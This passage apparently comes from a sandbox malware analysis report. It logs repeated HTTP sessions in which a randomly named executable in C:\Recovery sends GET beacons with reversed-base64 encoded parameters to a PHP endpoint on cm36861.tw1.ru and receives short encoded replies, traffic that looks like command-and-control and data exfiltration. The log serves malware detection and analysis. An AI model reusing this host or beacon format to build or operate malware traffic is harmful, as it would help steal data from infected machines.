TZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:33.218961954 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49836	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:38.233417034 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:39.154059887 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49865	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:44.218628883 CEST	2137	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:45.108195066 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49897	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:50.124491930 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:51.012800932 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye
Oct 24, 2024 13:57:56.026618004 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:56.302174091 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49957	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:01.311800957 CEST	2161	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:02.208890915 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49988	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:07.235419035 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:58:08.156704903 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49989	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:13.170948982 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:58:14.067550898 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49990	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:19.105032921 CEST	2161	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:19.995623112 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49991	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
